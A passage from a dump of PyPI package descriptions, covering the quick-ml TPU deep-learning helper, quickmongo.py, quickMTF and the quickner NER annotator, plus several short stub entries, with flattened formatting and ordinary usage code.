Notebooksw/TPU enabled ON.\nFor best performance, import the pretrained weights dataset in the Kaggle Notebook. (https://www.kaggle.com/superficiallybot/tf-keras-pretrained-weights)Tensorflow version==2.4.0Python 3.6+Note-> Don't import tensorflow in the beginning. 
With the upcoming updates in the tensorflow, it might take some time to reflect the corresponding changes to the package. The package is built and tested on the most stable version of tensorflow mentioned in the Specifications.Few Words about the packageThe idea behind designing the package was to\nreduce the unncessary training time for Deep Learning Models.\nThe experimentation time if reduced can help the people concerned with\nthe package to focus on the finer details which are often neglected.\nIn addition to this, there are several utility functions provided at a single\nplace aimed at expediting the ML workflow. These utility functions have been designed\nwith ease of use as the foremost priority and attempt has been made to\noptimize the TPU computation as well as bring in most of the functionalities. Attempt has been made to reduce about 500-700 lines of code or even more (depending on what you are about to use) to less than 10 lines of code. Hope you like it!Table of ContentsInstallationGetting StartedMaking Custom Datasets (TFRecords)Labeled DataUnlabeled DataVisualize & Check the DataBegin Working w/ TPUCreate Models QuicklyModels Training ReportCallbacksPredictionsK-Fold Training & PredictionsExamplesFeedback & DevelopmentUpcoming Features!LicenseInstallationYou can quickly get started with the package using pip command.!pip install quick-mlOnce you have installed quick_ml package, you can get started with your Deep Learning Workflow.Quickly check whether the correct version of tenserflow has been installed and import tensorflow by the following statement.import tensorflow as tf\nimport quick_mlCheck the output to know about the status of your installation. Also add,Getting StartedLet's begin exploring the package.Making Custom Datasets (TFRecords)To obtain the best performance using TPUs, the package accepts only TFRecords Dataset(s).\nEither you have ready-made TFRecords Dataset or you want to obtain TFRecords Dataset for your own image data. This section is devoted to explaining about how to obtain your own Image Dataset TFRecords.Note-> To utilize the TFRecords dataset created, ensure that the dataset is public while uploading on Kaggle.Note-> No need to haveTPU ONfor making TFRecords files. Making TFRecords is CPU computation.Note-> It is better to make TFRecords dataset on Google Colab ( > 75 GB) as Kaggle Kernels have limited Disk Space( < 5 GB). Download the datasets after you are done. Upload them on Kaggle as public datasets. Input the data in the Kaggle Notebooks.Let's get started withtfrecords_makermodule ofquick_mlpackage.Labeled DataFor Labeled Data, make sure that the dataset follows the following structure ->/ Data-Class1-Class2-Class3-ClassNwhere Class1, Class2, .. , ClassN denote the folders of images as well the class of the images. These shall serve as the labels for classification.This is usually used for training and validation data.However, it can also be used to create labeled Test Data.To make labeled data, there are 2 options.Convert entire image folder to tfrecords file.Split the Image Dataset folder in a specified ratio & make tfrecords files.A) Convert entire image folder to tfrecords filefrom quick_ml.tfrecords_maker import create_tfrecord_labeled\nfrom quick_ml.tfrecords_maker import get_addrs_labelTo create a tfrecords dataset file from this, the following would be the function call :-create_tfrecord_labeled(addrs, labels, output_filename, IMAGE_SIZE = (192,192))However, you would need the address (addrs) and (labels) and shuffle them up. 
This has been implemented for you in theget_addrs_label. Follow the line of code below.addrs, labels = get_addrs_labels(DATA_DIR)where DATA_DIR directs to the path of the Dataset with the structure mentioned in the beginning of Labeled Data TFRecords.Obtain the tfrecords file by giving a output_filename you would desire your output file to have using this line of code.create_tfrecord_labeled(addrs, labels, output_filename, IMAGE_SIZE = (192,192))Ensure that you save the Labeled TFRecord Format somewhere as you would require it to read the data at a later stage. Preferred way of achieving this is through saving it in the Markdown cell below the above code cell. After uploading on Kaggle and making dataset public, adding the Labeled TFRecords Format in the Dataset Description.B) Split the Image Dataset Folder in a specified ratio & make tfrecords files.from quick_ml.tfrecords_maker import create_split_tfrecords_dataTo create two tfrecords datasets from the Image Dataset Folder, use the following line of code :-create_split_tfrecords_data(DATA_DIR, outfile1name, outfile2name, split_size_ratio, IMAGE_SIZE = (192,192))DESCRIPTION=>DATA_DIR-> This refers to the Path to the Dataset Folder following the structure mentioned above.outfile1name+outfile2name-> Give names to the corresponding output files obtained through the split of the dataset asoutfile1name&outfile2name.split_size_ratio-> Mention the split size ratio you would to divide your dataset into.IMAGE_SIZE-> The Image Size you would like to set all the images of your dataset in the tfrecords file.RETURNS=>Doesn't return anything. Stores the TFRecords file(s) to your disk. Ensure sufficient disk space.Unlabeled DataFor unlabeled data, make sure to follow the following structure./ Datafile1file2file3file4fileNwhere file1, file2, file3, fileN denote the unlabeled, uncategorized image files. The filenames serve as the Id which is paired with the Images as an identification.This is usually used for test data creation(unknown, unclassified).To make unlabeled TFRecords dataset, you would needcreate_tfrecord_unlabeled&get_addrs_ids.from quick_ml.tfrecords_maker import create_tfrecord_unlabeled\nfrom quick_ml.tfrecords_maker import get_addrs_idsFirst, obtain the image addresses (addrs) and image ids (ids) usingget_addrs_idsin thetfrecords_makermodule.addrs, ids = get_addrs_ids(Unlabeled_Data_Dir)where,Unlabeled_Data_dir refers to the Dataset Folder which follows the structure of unlabeled dataset.After getting the addrs & ids, pass the right parameters for the function to make the TFRecords Dataset for you.unlabeled_dataset = create_tfrecord_unlabeled(out_filename, addrs, ids, IMAGE_SIZE = (192,192))DESCRIPTION=>out_filename- name of the tfrecords outputfile name.addrs- the addrs of the images in the data folder. (can be obtained using get_addrs_ids())ids- the ids of the imahes in the data folder. (can be obtained using get_addrs_ids())IMAGE_SIZE- The Image Size of each image you want to have in the TFRecords dataset. Default, (192,192).RETURNS=>A TFRecords dataset with examples with 'image' as the first field & 'idnum' as the second field.Visualize & Check the DataAfter creating your TFRecords Dataset (labeled or unlabeled), you would like to check and glance through your dataset. For this import,visualize_and_check_datafromquick_ml.To get started, write the following line of code. 
:-from quick_ml.visualize_and_check_data import check_one_image_and_label, check_batch_and_labels, check_one_image_and_id, check_batch_and_idsAvailable methods are :-check_one_image_and_labelcheck_batch_and_labelscheck_one_image_and_idcheck_batch_and_idscheck_one_image_and_labelUse this for checking labeled TFRecords Dataset. It displays only one image along with its label when the labeled TFRecords dataset is passed as an argument.check_one_image_and_label(tfrecord_filename)Description=>Displays one image along with its label.Pass the tfrecord_filename as the argument. It will display one image along with its label from the tfrecords dataset.check_batch_and_labelsUse this for checking labeled TFRecords Dataset. It displays a grid of images along with their labels given the tfrecords dataset passed as an argument.check_batch_and_labels(tfrecord_filename, n_examples, grid_rows, grid_columns, grid_size = (8,8)Description=>Displays a grid of images along with their labels.Pass the tfrecord_filename, the number of examples to see (n_examples), divide the n_examples into product of rows (grid_rows) and columns (grid_columns) such that n_examples = grid_rows * grid_columns. Finally the grid_size as a tuple, Default (8,8) as an argument. It will display a grid of images along with their labels from the tfrecords dataset.check_one_image_and_idUse this for checking unlabeled TFRecords Dataset. It displays only one image along with its id when the unlabeled TFRecords dataset is passed as an argument.check_one_image_and_id(tfrecord_filename)Description=>Displays one image along with its id.Pass the tfrecord_filename as the argument. It will display one image along with its id from the tfrecords dataset.check_batch_and_idsUse this for checking unlabeled TFRecords Dataset. It displays a grid of images along with their ids given the tfrecords dataset passed as an argument.check_batch_and_ids(tfrecord_filename, n_examples, grid_rows, grid_columns, grid_size = (8,8)Description=>Displays a grid of images along with their ids.Pass the tfrecord_filename, the number of examples to see (n_examples), divide the n_examples into product of rows (grid_rows) and columns (grid_columns) such that n_examples = grid_rows * grid_columns. Finally the grid_size as a tuple, Default (8,8) as an argument. It will display a grid of images along with their ids from the tfrecords dataset.Begin working w/ TPUThis helps you to get the TPU instance, TPU strategy, load the training dataset, validation dataset & test dataset from their TFRecords file & GCS_DS_PATH.To get all the required utilities, use the following line of code.from quick_ml.begin_tpu import define_tpu_strategy, get_training_dataset, get_validation_dataset, get_test_datasetAvailable Methods & Functionalities=>define_tpu_strategyget_training_datasetget_validation_datasetget_test_datasetdefine_tpu_strategyThis returns the tpu instance and the tpu strategy.strategy, tpu = define_tpu_strategy()get_training_datasetHelps you load the tfrecords file (TRAINING DATASET).train_dataset = get_training_dataset(GCS_DS_PATH, train_tfrec_path, BATCH_SIZE)Description=>GCS_DS_PATH- The GCS Bucket Path of the tfrecords dataset.train_tfrec_path- the train tfrecords filename path. eg. 
'/train.tfrecords'BATCH_SIZE- Select the batch size for the images to load in the training dataset instance.Returns=>A tfrecords dataset instance which can be fed to model training as the training dataset.get_validation_datasetHelps you load the tfrecords file (VALIDATION DATASET).val_dataset = get_validation_dataset(GCS_DS_PATH, val_tfrec_path, BATCH_SIZE)Description=>GCS_DS_PATH- The GCS Bucket Path of the tfrecords dataset.val_tfrec_path- the validation tfrecords filename path. eg. '/val.tfrecords'BATCH_SIZE- Select the batch size for the images to load in the validation dataset instance.Returns=>A tfrecords dataset instance which can be fed to model training as the validation dataset.get_test_datasetHelps you load the tfrecords file (TEST DATASET).test_dataset = get_test_dataset(GCS_DS_PATH, test_tfrec_path, BATCH_SIZE)Description=>GCS_DS_PATH- The GCS Bucket Path of the tfrecords dataset.test_tfrec_path- the test tfrecords filename path. eg. '/test.tfrecords'BATCH_SIZE- Select the batch size for the images to load in the test dataset instance.Returns=>A tfrecords dataset instance which can be used for prediction as test dataset.Create Model QuicklyThis helps you to create a model ready for training all in a single line of code.This includes loading the pretrained model along with the weights, addition of the the classification model on top of pretrained model and the compilation of the model. All in a single line of code.The function is situated in theload_models_quickmodule ofquick_mlpackage.from quick_ml.load_models_quick import create_modelcreate_model()function parameters/arguments :-model = create_model(classes, model_name = 'VGG16', classification_model = 'default', freeze = False, input_shape = [512, 512,3], activation = 'softmax', weights= \"imagenet\", optimizer = 'adam', loss = 'sparse_categorical_crossentropy', metrics = 'sparse_categorical_accuracy')Arguemnts Description=>classes- Number of classes for classification.model_name- Name of the model. Default, VGG16.Available models ->MODELS -> 'VGG16', 'VGG19','Xception','DenseNet121', 'DenseNet169', 'DenseNet201','ResNet50', 'ResNet101', 'ResNet152', 'ResNet50V2', 'ResNet101V2', 'ResNet152V2','MobileNet', 'MobileNetV2','InceptionV3', 'InceptionResNetV2','EfficientNetB0', 'EfficientNetB1', 'EfficientNetB2', 'EfficientNetB3', 'EfficientNetB4', 'EfficientNetB5', 'EfficientNetB6', 'EfficientNetB7'classification_model- The classification model which you want to attach as the top to the pretrained model. The 'default' classification model has a Global Average Pooling2D followed by Dense layer with output nodes same as the number of classes for classification.You can define your own classification_model (Sequential Model) and pass the model as an argument to the classification model.class_model = tf.keras.Sequential([\ntf.keras.layers(),\ntf.keras.layers()\n])\n\nget_models_training_report(models, tpu, n_class, traindata, steps_per_epoch, epochs, val_data, classification_model = class_model)freeze- True or False. Whether or not to freeze the pretrained model weights while training the model. Default, False.input_shape- Input shape of the images of the TFRecords Dataset. Default, [512,512,3]activation- The activation function to be used for the final layer of the classification model put on top of the pretrained model. For Binary Classification, use 'sigmoid'. For multi-class classification, use 'softmax'. Default, 'softmax'.weights- What kind of weights to use for the pretrained model you have decided as your model backbone. 
Default, 'imagenet'. Options, 'imagenet' & None. In case you are using 'imagenet' weights, ensure you have loadedTF Keras pretrained weightsin your Kaggle Notebook.optimizer- The optimizer to be used for converging the model while training. Default, 'adam'.loss- Loss function for the model while training. Default, 'sparse_categorical_crossentropy'. Options, 'binary_crossentropy' or 'sparse_categorical_crossentropy'. Use 'binary_crossentropy' for Binary Classifications. Use 'sparse_categorical_crossentropy' for multi-class classifications. Support for 'categorical_crossentropy' is not provided as it is computationally expensive. Both sparse & categorical cross entropy serve the same purpose.metrics- The metrics for gauging your model's training performance. Default, 'sparse_categorical_accuracy'. Options, 'sparse_categorical_accuracy' & 'accuracy'. For Binary Classifications, use 'accuracy'. For Multi-class classifications, use 'sparse_categorical_accuracy'.Returns=>A tf.keras.SequentialcompiledModel with base model as the pretrained model architecture name specified along with the classification model attached. This model isready for trainingvia model.fit().Models Training ReportThis utility function is designed for getting to know which models are the best for the dataset at hand. Manually training models one by one is troublesome as well as cumbersome. A smart and quick way of achieving this is by using theget_models_training_report()fromquick_ml.training_predictions.To get started, import thetraining_predictionsmodule fromquick_mlfrom quick_ml.training_predictions import get_models_training_reportAfter passing in the arguments for get_models_training_report, you will obtain a pandas dataframe. However, before getting into the details of the output and what are the parameters to be passed to the function, let's take a quick view of the table output format.Output Table OverviewTable Preview of the Pandas DataFrame that is return upon calling the function to obtain training_report.Model NameTrain_top1_AccuracyTrain_top3_AccuracyVal_top1_AccuracyVal_top3_AccuracyModel_197.1969493.1Model_296.2929391Model_3989697.196Model_490878583Model_570615551Model_691869088Table Description :-1) Model Name -> Name of the model trained on the dataset2) Top 1 Accuracy -> The last accuracy score on training dataset3) Top 3 Accuracy -> The average of the last 3 accuracy scores on training dataset4) Val Top 1 Accuracy -> The last validation accuracy score on validation dataset5) Val Top 3 Accuracy -> The average of the last 3 validation accuracy scores on validation datasetUsing Models Training ReportOnce you have successfully importedget_models_training_report, pass the arguments as per your requirement. The function returns a pandas dataframe with a table similar to above. The arguemnts are -get_models_training_report(models, tpu, n_class, traindata, steps_per_epoch, epochs, val_data, classification_model = 'default', freeze = False, input_shape = [512,512,3], activation = 'softmax', weights = 'imagenet', optimizer = 'adam', loss = 'sparse_categorical_crossentropy', metrics = 'sparse_categorical_accuracy', plot = False)Arguments Description->models- list of models to obtain the training report on. eg.models = ['VGG16', 'EfficientNetB7', 'InceptionV3', 'ResNet50']tpu- The TPU instancen_class- number of classes in the Datasettraindata- The training dataset (In TFRecords Dataset)steps_per_epoch- number of steps to be taken per epoch. 
Ideally, it should be number of training images // BATCH_SIZEepochs- Number of epochs for which models are to be trained.val_data- The validation dataset (In TFRecords Dataset)classification_model- The classification model which you want to attach as the top to the pretrained model. The 'default' classification model has a Global Average Pooling2D followed by Dense layer with output nodes same as the number of classes for classification.You can define your own classification_model (Sequential Model) and pass the model as an argument to the classification model.class_model = tf.keras.Sequential([\ntf.keras.layers(),\ntf.keras.layers()\n])\n\nget_models_training_report(models, tpu, n_class, traindata, steps_per_epoch, epochs, val_data, classification_model = class_model)freeze- Whether or not you want to freeze the pretrained model weights. Default, False.input_shape - Defines the input_shape of the images of the dataset. Default, [512,512,3]activation- The activation function for the final Dense layer of your Classification model. Default, 'softmax'. For binary classification, change to 'sigmoid' with n_class = 1.weights- The pretrained Model weights to be taken for consideration. Default, 'imagenet'. Support for 'noisy-student' coming soon.optimizer - The optimizer for the model to converge while training. Default, 'adam'loss- loss function to consider while training your deep learning model. Two options supported. 'Sparse Categorical CrossEntropy' & 'Binary Cross Entropy'. Default, 'Sparse Categorical CrossEntropy'.metrics- The metric to be taken under consideration while training your deep learning model. Two options available. 'accuracy' & 'sparse_categorical_accuracy'. Use 'accuracy' as a metric while doing Binary Classification else 'sparse_categorical_accuracy'. Default, 'sparse_categorical_accuracy'.plot- Plot the training curves of all the models for quick visualization. Feature Coming soon.Returns=>A Pandas Dataframe with a table output as shown above. You can save the function output in a variable and save the dataframe to your disk using the .to_csv() method.CallbacksIn case the classes of your dataset have a high similarity index, it is imperative to have the callbacks necessary for your model training and convergence. For obtaining such a model, callbacks are often used.\nThis utility aims at providing callbacks which are often used while training deep learning models and returns a list of callbacks. Pass this as an argument while training deep learning models.from quick_ml.callbacks import callbacksLearning Rate SchedulerThere are 3 different types of learning rate schedulers.RAMPUP Learning Rate SchedulerSimple Learning Rate SchedulerStep-wise Learning Rate SchedulerEarly Stopping CallbackUse Early Stopping Callback as a measure to prevent the model from overfitting. The default callback setting is as follows: monitor : 'val_loss', min_delta = 0, patience = 0, verbose = 0,mode = 'auto', baseline = None, restore_best_weights = False.To use the default settings of Early Stopping Callback, passcallbacks = callbacks(early_stopping = \"default\")Reduce LR On PlateauPrevent your model from getting stuck at local minima using the ReduceLROnPlateau callback.
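Before the ReduceLROnPlateau defaults listed next, here is a rough sketch (not an official example from the package) of how a callbacks list produced by this helper might be wired into training, reusing define_tpu_strategy, get_training_dataset and create_model exactly as described in the earlier sections; the GCS bucket path, tfrecords filenames, class count, batch size, epochs and steps are hypothetical placeholders, and building the model inside strategy.scope() is an assumption of standard TPU practice rather than something the package documents.

# Hedged end-to-end sketch: TPU strategy, datasets, model and callbacks combined.
# Placeholder values (bucket path, filenames, 5 classes, batch size 128, 5 epochs,
# 100 steps per epoch) are illustrative only.
from quick_ml.begin_tpu import define_tpu_strategy, get_training_dataset, get_validation_dataset
from quick_ml.load_models_quick import create_model
from quick_ml.callbacks import callbacks

strategy, tpu = define_tpu_strategy()                  # TPU instance and strategy, as documented
GCS_DS_PATH = 'gs://my-bucket'                         # hypothetical GCS bucket path
train_data = get_training_dataset(GCS_DS_PATH, '/train.tfrecords', 128)
val_data = get_validation_dataset(GCS_DS_PATH, '/val.tfrecords', 128)

with strategy.scope():                                 # assumed standard TPU practice
    model = create_model(5, model_name='EfficientNetB0')   # documented defaults otherwise

cb_list = callbacks(lr_scheduler='rampup',             # RAMPUP learning-rate schedule
                    early_stopping='default',          # default EarlyStopping settings
                    reduce_lr_on_plateau='default')    # default ReduceLROnPlateau settings

history = model.fit(train_data,
                    steps_per_epoch=100,
                    epochs=5,
                    validation_data=val_data,
                    callbacks=cb_list)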
The default implementation has the following parameter settings =>'monitor' : 'val_loss', 'factor' : 0.1, 'patience' : 10, 'verbose' : 0, mode = 'auto', min_delta = 0.0001, cooldown = 0, min_lr = 0Combine Multiple callbackscallbacks = callbacks(lr_scheduler = 'rampup', early_stopping = 'default', reduce_lr_on_plateau = 'default' )PredictionsThe package supports multiple options to obtain predictions on your testDataset (only TFRecords Format Dataset).Supported Methods for obtaining predictions ->get_predictionsensemble_predictionsModel AveragingModel WeightedTrain K-Fold (Coming Soon)Test Time Augmentations (Coming Soon)Get PredictionsObtain predictions on theTEST TFRECORDS Data Formatusing get_predictions().Two call types have been defined for get_predictions().Import the predictions function.from quick_ml.predictions import get_predictionsFirst Definition ->Use this function definition when you have the GCS_DS_PATH, test_tfrec_path, BATCH_SIZE.This is usually helpful when you have trained model weights from a different session and want to obtain predictions in a different session. Usually beneficial if there are multiple models from which predictions are to be obtained. Training of multiple models using get_models_training_report() from quick_ml.training_predictions in one session. Saving the best model weights in the same session using create_model() from quick_ml.load_models_quick. Testing/Predictions in a different session for multiple models using this function definition. This is the best way to deal with multiple models.predictions = get_predictions(GCS_DS_PATH, test_tfrec_path, BATCH_SIZE, model)Second DefinitionUse this function when you have testTFDataset and model.This function definition is usually the best option when you have one model and want to obtain the predictions in the same session. For this, you must have loaded the datasets before. However, you are free to explore better possibilities with the above two functions.prediction = get_predictions(testTFdataset, model)K-Fold Training & PredictionsK-Fold Cross Validation is usually performed to verify that the selected model's good performance isn't due to data bias.This would be highly beneficial after obtaining the Training Report of the models and you have selected the model architecture you will be working with.To get started with K-Fold Cross Validation & Predictions,from quick_ml.k_fold_training import train_k_fold_predictFunction Definition :-train_k_fold_predict(k, tpu, train_tfrecs, val_tfrecs, test_tfrecs, GCS_DS_PATH, BATCH_SIZE)Description=>k-> The number of folds. Usually, 5 or 10.tpu-> the tpu instance. To be obtained from define_tpu_strategy()train_tfrecs-> The complete path location of the tfrecord files of the training dataset.val_tfrecs-> The complete path location of the tfrecord files of the validation dataset.test_tfrecs-> The complete path location of the tfrecord files of the test dataset.GCS_DS_PATH-> The Google Cloud Bucket Service Location of the Dataset.BATCH_SIZE-> Select the batch size of the training dataset. Usually, the value should be a multiple of 128 for efficient utilization of TPUs.Returns=>Doesn't return anything. Saves an output file with the result of each fold training along with its validation result.ExamplesFollowing are a few Kaggle Notebooks showing the working ofquick_mlpython package.TFRecords Dataset Making ->Notebook 1Binary Classification ->Notebook 2Multi-Class Classification ->Notebook 3Feedback & DevelopmentWant to contribute?
Great!Send your ideas toantoreepjana@gmail.comand ensure the format of the subject of the mail as\n[quick_ml Contribute] -> [Your Subject]Want to suggest an improvement or a feature? Most Welcome!Send your ideas toantoreepjana@gmail.comand ensure the format of the subject of the mail as [quick_ml Suggestion] -> [Your Subject]Want to share errors or complaint something which you didn't like? That's how it improves ;)Send your grievances toantoreepjana@gmail.comand ensure the format of the subject of the mail as [quick_ml Grievances] -> [Your Subject]Want to send love, thanks and appreciation? I'd love to hear from you!Send your love toantoreepjana@gmail.comand ensure the format of the subject of the mail as [quick_ml Feedback] -> [Your Subject]Upcoming Features!Data Augmentations on TPU.Support for Hyper-Parameter TuningLicenseMITFree Software, Hell Yeah!"} +{"package": "quickmock", "pacakge-description": "No description available on PyPI."} +{"package": "quick-mock", "pacakge-description": "quick-mockquick mock serverA Simple Examplemock create project hello\ncd hello\nmockcreate projectmock create project create interfacemock create interface run mock serveruse default port(5000): mock\n\nspecify port: mock run port "} +{"package": "quickmongo.py", "pacakge-description": "Quick IntroQuickmongo.py is a quick wrapper for pymongo to access mongodb! You can use pymongo if you know it!Quick DocsInstallationIn your terminal:pip install quickmongo.pyIn your python file:fromquickmongoimportDatabase# If you are using locallydb=Database('mongodb://localhost:27017/',{'db_name':'local'})# if you are using 'mongodb+srv://' uri then you should do something like thisdb=Database(mongoURL)# mongourl will be the 'mongodb+srv://' uri link# clusterName will be the name of the mongoose cluster. Eg:- Cluster0# Incase if you don't know what is your clustername you will get an TypeError with available clusters!Options of DatabasesSet some options for your database as a dict which is optionaloptions={'collection_name':'yourCollectionName',# Collection name will be 'python' as default'db_name':'Cluster0'# This is optional unless you are using localhost you have to set it to local!}db=Database(mongoURL,options)# mongoURL is described aboveGet databases and collections# Get all database names under the linkprint(db.all_database_names())# Check if the given database exists in the listprint(db.database_exists('Cluster0'))# Get all collections names under the linkprint(db.all_collection_names())# Check if the given collection exists in the listprint(db.collection_exists('python'))All Operationsdb.set('foo','bar')# Will set value 'bar' for the key 'foo'db.get('foo')# Will return 'bar' which is the value of the key 'foo'db.all()# Will return all keys and values of the collection! {'key': 'foo', 'value': 'bar'} as a dictdb.startswith('f')# Will sort all data whose keys startswith 'f' as {'key': 'foo', 'value': 'bar'}db.delete('foo')# Will delete value of the key 'foo'db.delete_all()# Will delete all values of the all keys! Simple drop() functiondb.set('foo',1)# Simple set function given description abovedb.add('foo',2)# Will add 2 to the old value. So the current value will be 3db.subtract('foo',1)# Will subtract 1 from old value of the key 'foo'. 
So the current value will be 1db.math('foo','*',5)# Will multiply value by 5 so 1*5 = 5db.math('foo','**',5)# 5**5 = 25db.math('foo','/',5)# 25/5 = 5db.math('foo','+',1)# 5+1 = 6db.math('foo','-',1)# 6-1 = 5db.typeof('foo')# Its currently int so it will return EventsEvents are functions which will trigger on paticular timesReady Event:defready():print('Connected with database')db=Database(mongoURL='your-url',events={'ready':ready})# Will run ready callback when db is ready!Contribute codes to this packages by githubhereSupportJoin our Discord ServerGitHub Repo"} +{"package": "quick-montage", "pacakge-description": "No description available on PyPI."} +{"package": "quickmpc", "pacakge-description": "No description available on PyPI."} +{"package": "quickMTF", "pacakge-description": "Copyright (c) 2022 lorry_rui , Fremont ,USAPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.*for image quaility test purpose like lens focus test @ Lorry RUi=======================\nHomepage: quickMTFPyPI Package PageSource Code.. image::https://github.com/Lorrytoolcenter/quickMTF/doc/linepair2.png:align: center\n.. image:: doc/linepair2.png\n:width: 600:github_url:https://github.com/Lorrytoolcenter/quickMTFMain FeaturesQuick calculation of MTF values for both linepair and slant edge MTF.Built-in GUI for image debugging and location picking.Plot MTF chartGUI:Check measure position percentage featureUndo:Undo one test.Clear all:Clear all tests.Save current display:Save the current scene.Save current image:Save the image with markers based on image size.Mail to: :lorryruizhihua@gmail.comThis is a GUI Sample.. image::https://github.com/Lorrytoolcenter/quickMTF/doc/manual.png.. image:: doc/manual.png\n:width: 600.. image:: doc/sfr.png\n:width: 600sample code for using lib quickMTF.. code-block:: pythonfrom quickMTF.quickMTF import quickMTF\nimport cv2ifname== 'main':\ntest = quickMTF()\nROI_width = 600\nROIX = 1593\nROIY = 1500\nimage = cv2.imread(\"image.jpg\")\nimage = image[ROIY:ROIY+10, ROIX:ROIX+ROI_width]print(test.quicklinepairMTF(image, library='cv2')) # linepair chart MTF value and pixels/line pair\n print(test.quicksfrMTF(image, cp=0.5)) # CP means cycles/pixel and out MTF value per c/p and slant angle\n print(test.quicksfrCP(image, mtf_indx=30)) # MTFindex means MTF and out Cycles/pixel per MTF value and slant angle"} +{"package": "quickmysql", "pacakge-description": "a tool to simplify common mysql tasks"} +{"package": "quickNAT-pytorch", "pacakge-description": "No description available on PyPI."} +{"package": "quickner", "pacakge-description": "Quickner \u26a1A simple, fast, and easy to use NER annotator for PythonQuickner is a new tool to quickly annotate texts for NER (Named Entity Recognition). 
It is written in Rust and accessible through a Python API.Quickner is blazing fast, simple to use, and easy to configure using a TOML file.Installation# Create a virtual environmentpython3-mvenvenvsourceenv/bin/activate# Install quicknerpipinstallquickner# or pip3 install quicknerUsageUsing the config filefromquicknerimportQuickner,Configconfig=Config(path=\"config.toml\")# or Config() if the config file is in the current directory# Initialize the annotatorquick=Quickner(config=config)# Annotate the texts using the config filequick.process()# or annotator.process(True) to save the annotated data to a fileUsing DocumentsfromquicknerimportQuickner,Document# Create documentsrust=Document(\"rust is made by Mozilla\")python=Document(\"Python was created by Guido van Rossum\")java=Document(\"Java was created by James Gosling\")# Documents can be added to a listdocuments=[rust,python,java]# Initialize the annotatorquick=Quickner(documents=documents)quick>>>Entities:0|Documents:3|Annotations:>>>quick.documents[Document(id=\"87e03d58b1ba4d72\",text=rustismadebyMozilla,label=[]),Document(id=\"f1da5d23ef88f3dc\",text=PythonwascreatedbyGuidovanRossum,label=[]),Document(id=\"e4324f9818e7e598\",text=JavawascreatedbyJamesGosling,label=[])]>>>quick.entities[]Using Documents and EntitiesfromquicknerimportQuickner,Document,Entity# Create documents from textstexts=(\"rust is made by Mozilla\",\"Python was created by Guido van Rossum\",\"Java was created by James Gosling at Sun Microsystems\",\"Swift was created by Chris Lattner and Apple\",)documents=[Document(text)fortextintexts]# Create entitiesentities=((\"Rust\",\"PL\"),(\"Python\",\"PL\"),(\"Java\",\"PL\"),(\"Swift\",\"PL\"),(\"Mozilla\",\"ORG\"),(\"Apple\",\"ORG\"),(\"Sun Microsystems\",\"ORG\"),(\"Guido van Rossum\",\"PERSON\"),(\"James Gosling\",\"PERSON\"),(\"Chris Lattner\",\"PERSON\"),)entities=[Entity(*(entity))forentityinentities]# Initialize the annotatorquick=Quickner(documents=documents,entities=entities)quick.process()>>>quickEntities:6|Documents:3|Annotations:PERSON:2,PL:3,ORG:1>>>quick.documents[Document(id=87e03d58b1ba4d72,text=rustismadebyMozilla,label=[(0,4,PL),(16,23,ORG)]),Document(id=f1da5d23ef88f3dc,text=PythonwascreatedbyGuidovanRossum,label=[(0,6,PL),(22,38,PERSON)]),Document(id=e4324f9818e7e598,text=JavawascreatedbyJamesGosling,label=[(0,4,PL),(20,33,PERSON)])]Find documents by label or entityWhen you have annotated your documents, you can use thefind_documents_by_labelandfind_documents_by_entitymethods to find documents by label or entity.Both methods return a list of documents, and are not case sensitive.Example:# Find documents by label>>>quick.find_documents_by_label(\"PERSON\")[Document(id=f1da5d23ef88f3dc,text=PythonwascreatedbyGuidovanRossum,label=[(0,6,PL),(22,38,PERSON)]),Document(id=e4324f9818e7e598,text=JavawascreatedbyJamesGosling,label=[(0,4,PL),(20,33,PERSON)])]# Find documents by entity>>>quick.find_documents_by_entity(\"Guido van Rossum\")[Document(id=f1da5d23ef88f3dc,text=PythonwascreatedbyGuidovanRossum,label=[(0,6,PL),(22,38,PERSON)])]>>>quick.find_documents_by_entity(\"rust\")[Document(id=87e03d58b1ba4d72,text=rustismadebyMozilla,label=[(0,4,PL),(16,23,ORG)])]>>>quick.find_documents_by_entity(\"Chris Lattner\")[Document(id=3b0b3b5b0b5b0b5b,text=SwiftwascreatedbyChrisLattnerandApple,label=[(0,5,PL),(21,35,PERSON),(40,45,ORG)])]Get a Spacy Compatible Generator ObjectYou can use thespacymethod to get a spacy compatible generator object.The generator object can be used to feed a spacy model with the annotated 
data, you still need to convert the data into DocBin format.Example:# Get a spacy compatible generator object>>>quick.spacy()# Divide the documents into chunks>>>chunks=quick.spacy(chunks=2)>>>forchunkinchunks:...print(chunk)...[('rust is made by Mozilla',{'entitiy':[(0,4,'PL'),(16,23,'ORG')]}),('Python was created by Guido van Rossum',{'entitiy':[(0,6,'PL'),(22,38,'PERSON')]})][('Java was created by James Gosling at Sun Microsystems',{'entitiy':[(0,4,'PL'),(20,33,'PERSON'),(37,53,'ORG')]}),('Swift was created by Chris Lattner and Apple',{'entitiy':[(0,5,'PL'),(21,34,'PERSON'),(39,44,'ORG')]})]Single document annotationYou can also annotate a single document with a list of entities.This is useful when you want to annotate a document with a list of entities is not in the list of entities of the Quickner object.Example:fromquicknerimportDocument,Entity# Create a document from a string# Method 1rust=Document.from_string(\"rust is made by Mozilla\")# Method 2rust=Document(\"rust is made by Mozilla\")# Create a list of entitiesentities=[Entity(\"Rust\",\"PL\"),Entity(\"Mozilla\",\"ORG\")]# Annotate the document with the entities, case_sensitive is set to False by default>>>rust.annotate(entities,case_sensitive=True)>>>rustDocument(id=\"87e03d58b1ba4d72\",text=rustismadebyMozilla,label=[(16,23,ORG)])>>>rust.annotate(entities,case_sensitive=False)>>>rustDocument(id=\"87e03d58b1ba4d72\",text=rustismadebyMozilla,label=[(16,23,ORG),(0,4,PL)])Load from fileInitialize the Quickner object from a file containing existing annotations.Quickner.from_jsonlandQuickner.from_spacyare class methods that return a Quickner object and are able to parse the annotations and entities from a jsonl or spaCy file.fromquicknerimportQuicknerquick=Quickner.from_jsonl(\"annotations.jsonl\")# load the annotations from a jsonl filequick=Quickner.from_spacy(\"annotations.json\")# load the annotations from a spaCy fileConfigurationThe configuration file is a TOML file with the following structure:# Configuration file for the NER tool[general]# Mode to run the tool, modes are:# Annotation from the start# Annotation from already annotated texts# Load annotations and add new entities[logging]level=\"debug\"# level of logging (debug, info, warning, error, fatal)[texts][texts.input]filter=false# if true, only texts in the filter list will be 